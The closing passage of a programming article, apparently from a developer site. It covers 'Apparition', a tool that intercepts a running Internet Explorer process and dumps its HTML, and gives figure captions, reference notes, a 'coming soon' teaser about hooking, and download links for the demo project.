  23. Tools to peek the PE file. YAHU, or Yet Another Header Utility (http://msdn.microsoft.com/archive/default.asp?url=/archive/en-us/dnarwbgen/html/msdn_exeform.asp), by Ruediger R. Asche, 1995. All source code available.
  24. or

    Figure 3.13: An IE running to be intercepted by “Apparition”

    Figure 3.14: “Apparition” dumped that IE’s HTML in runtime

    This article is already long enough, but I still have to remind you. Do not use this way if you just want your GUI program interacting with IE. Use BHO or check the article http://www.codeguru.com/ieprogram/enumIE.html (fix the memory leak bug by calling SysFreeString). My way is suitable for backend programming only, so coding is much much longer than these two ways!

    Coming Soon

    Logger Detector More or MSN 6 Hooking…

    Downloads

    Download Apparition Demo Project Source (including EXE, 1.22 Mb)
    Download Apparition Demo Exe File Only (exe/dll Only, MFC4.2 DLL STATIC linked, 256 Kb)

    Download HtmlPeek Demo Source and Exe (code and exe, 219 Kb, MFC42 static link)

More by Author

Get the Free Newsletter!

Subscribe to Developer Insider for top news, trends & analysis

Must Read